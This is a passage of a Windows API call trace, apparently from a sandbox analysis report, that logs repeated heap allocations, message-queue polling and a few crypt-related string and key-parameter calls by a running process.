hHeap=0x8a0000) returned 1 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0199.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.395] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.396] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0199.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0199.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.397] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0199.397] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0199.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.398] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.398] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0199.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0199.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0199.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0199.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0199.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0199.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0199.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0199.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0199.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0199.402] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c26c8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26c8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0199.402] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.402] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0199.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0199.402] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.402] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0199.403] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.403] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.403] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0199.403] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0199.403] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 